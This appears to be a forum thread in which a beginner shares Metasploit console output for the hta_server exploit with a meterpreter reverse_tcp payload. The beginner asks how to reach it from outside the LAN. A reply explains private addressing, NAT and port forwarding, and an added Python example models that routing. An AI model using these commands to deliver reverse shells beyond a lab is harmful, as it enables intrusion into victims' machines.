Cannot access hta server with url outside LAN with metasploit, reverse_tcp

I am creating an HTA server for Windows.

msf6 > set SRVHOST (my local ip)
SRVHOST => (my local ip)
msf6 > set LHOST (my local ip)
LHOST => (my local ip)
msf6 > set LPORT 12357
LPORT => 12357
msf6 > use exploit/windows/misc/hta_server
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/hta_server) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on (my local ip):12357
msf6 exploit(windows/misc/hta_server) > [*] Using URL: http://(my local ip):8080/2cvlsLmmrNEhu.hta
[*] Server started.

But when I use my phone, connected to another network, trying to access the URL does not work. I have searched for it but nobody has a similar question. I am a beginner that doesn’t know much, can anybody help me? I have tried replacing the local IP with my public IP, and it shows [-] Handler failed to bind to (my public IP):12357:- - What should I do? I have already forwarded port 8080 in my router preferences.

@tennessine said:

But when I use my phone, connected to another network, trying to access the URL does not work. I have searched for it but nobody has a similar question. I am a beginner that doesn’t know much, can anybody help me? I have tried replacing the local IP with my public IP, and it shows [-] Handler failed to bind to (my public IP):12357:- - What should I do? I have already forwarded port 8080 in my router preferences.

So I don’t really know the answer here as I’ve never tried this myself.

However, some networking fundamentals matter.

If your server is running on an IP address listed in RFC1918 as a “local internets” address, then you can’t access it from another network without some configuration changes to your networking setup.

If I have a network with a server listening on 10.10.10.10, I can’t access that from any device outside the network without some rule set up on the perimeter that routes external traffic to that internal IP.

For example, on my wifi network right now my laptop has IP 192.168.20.201. My phone is on a cellular network and has a 10/8 IP address on that network. If I want to send packets from my phone to my laptop I need the wifi network’s external IP address. Then the packets have to go from the phone network, onto the internet and then hit the external firewall on my wifi network. If I have a rule on the firewall which routes traffic to 192.168.20.201 then I would be able to access it. If I don’t have a rule, the firewall just drops the packet.

You can’t, easily, get MSF to just listen on your external IP address - as it still needs the perimeter devices to route traffic and it’s not really an IP address on your device.

You might find it easier to use virtual machines on the same network, rather than try to configure cross-network communications.
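
The routing described in the reply above, as an added Python example that is not part of either post: it models a perimeter device with one port-forward rule and checks whether an address can be bound on the local host. The external address 203.0.113.10 (documentation range), the rule table, port 9000 and the function names are constructed for illustration.

```python
import ipaddress
import socket

# Constructed values: the laptop address is the one from the reply above;
# the external address comes from the TEST-NET-3 documentation range.
EXTERNAL_IP = "203.0.113.10"
PORT_FORWARDS = {("tcp", 8080): ("192.168.20.201", 8080)}  # perimeter rules
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_rfc1918(ip):
    """True if ip falls in one of the three RFC 1918 private ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


def route_inbound(dst_ip, dst_port, proto="tcp"):
    """Decide what happens to a packet sent from an outside network."""
    if is_rfc1918(dst_ip):
        # Private destinations are never carried across the internet.
        return ("unroutable", None)
    if dst_ip != EXTERNAL_IP:
        return ("not-this-network", None)
    target = PORT_FORWARDS.get((proto, dst_port))
    if target is None:
        return ("dropped", None)  # no rule on the perimeter device
    return ("forwarded", target)


def can_bind(ip):
    """True only if the OS lets a listener bind ip (it is on a local interface)."""
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.bind((ip, 0))  # port 0: let the OS pick any free port
            return True
    except OSError:
        return False  # typically EADDRNOTAVAIL: address not assigned here


if __name__ == "__main__":
    for dst, port in [("192.168.20.201", 8080), (EXTERNAL_IP, 8080),
                      (EXTERNAL_IP, 9000)]:
        print(dst, port, route_inbound(dst, port))
    for ip in ("127.0.0.1", EXTERNAL_IP):
        print("bind", ip, can_bind(ip))
```

The failed bind is the same condition the reply describes: behind NAT the external address belongs to the perimeter device, not to an interface on the host.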